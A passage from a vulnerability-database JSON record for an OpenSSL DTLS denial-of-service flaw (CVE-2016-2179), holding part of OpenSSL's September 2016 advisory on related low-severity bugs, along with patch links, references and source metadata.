\nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.1.0 is not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-2179" }, { "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "db": "BID", "id": "92987" }, { "db": "VULMON", "id": "CVE-2016-2179" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2179", "trust": 3.3 }, { "db": "BID", "id": "92987", "trust": 2.0 }, { "db": "SECTRACK", "id": "1036689", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004778", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201609-103", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2179", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138820", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169633", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2179" }, { "db": "BID", "id": "92987" }, { "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2179" }, { "db": "CNNVD", "id": "CNNVD-201609-103" } ] }, "id": "VAR-201609-0031", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41024942 }, "last_update_date": "2023-12-25T20:37:50.294000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Fix DTLS buffered message DoS attack", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=f5c7f5dfbaf0d2f7d946d0fe86f08e6bcb36ed0d" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "Splunk Enterprise 6.4.5 addresses multiple vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapue" }, { "title": "Splunk Enterprise 6.5.1 addresses multiple OpenSSL vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "OpenSSL Security vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=63926" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-2179" }, { "title": "Red Hat: CVE-2016-2179", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2179" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Amazon Linux AMI: ALAS-2016-755", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-755" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "CVE Scanning of Alpine base images using Multi Stage builds in Docker 17.05\nSummary", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "OpenSSL-CVE-lib", "trust": 0.1, "url": "https://github.com/chnzzh/openssl-cve-lib " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2179" }, { "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "db": "CNNVD", "id": "CNNVD-201609-103" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "db": "NVD", "id": "CVE-2016-2179" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/92987" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapue" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1036689" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.7, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=f5c7f5dfbaf0d2f7d946d0fe86f08e6bcb36ed0d" }, { "trust": 0.9, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.9, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=f5c7f5dfbaf0d2f7d946d0fe86f08e6bcb36ed0d" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2179" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2179" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.6, "url": "https://www.openssl.org/news/vulnerabilities.html#y2017" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "https://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2016-10-07.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992348" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995886" }, { "trust": 0.2, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 0.2, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=48598" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2180" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6306" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2179" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2182" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6302" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1626883" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6308" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://sweet32.info)" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6307" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2179" }, { "db": "BID", "id": "92987" }, { "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2179" }, { "db": "CNNVD", "id": "CNNVD-201609-103" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2179" }, { "db": "BID", "id": "92987" }, { "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2179" }, { "db": "CNNVD", "id": "CNNVD-201609-103" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-09-16T00:00:00", "db": "VULMON", "id": "CVE-2016-2179" }, { "date": "2016-06-30T00:00:00", "db": "BID", "id": "92987" }, { "date": "2016-09-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "date": "2016-09-27T19:32:00", "db": "PACKETSTORM", "id": "138870" }, { "date": "2016-09-22T22:22:00", "db": "PACKETSTORM", "id": "138817" }, { "date": "2016-09-22T22:25:00", "db": "PACKETSTORM", "id": "138820" }, { "date": "2016-09-23T19:19:00", "db": "PACKETSTORM", "id": "138826" }, { "date": "2016-09-22T12:12:12", "db": "PACKETSTORM", "id": "169633" }, { "date": "2016-09-16T05:59:00.143000", "db": "NVD", "id": "CVE-2016-2179" }, { "date": "2016-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-103" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2179" }, { "date": "2018-01-18T12:00:00", "db": "BID", "id": "92987" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "date": "2023-11-07T02:31:01.590000", "db": "NVD", "id": "CVE-2016-2179" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-103" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "CNNVD", "id": "CNNVD-201609-103" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of DTLS Service disruption in implementations (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004778" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-103" } ], "trust": 0.6 } }
var-201201-0030
Vulnerability from variot
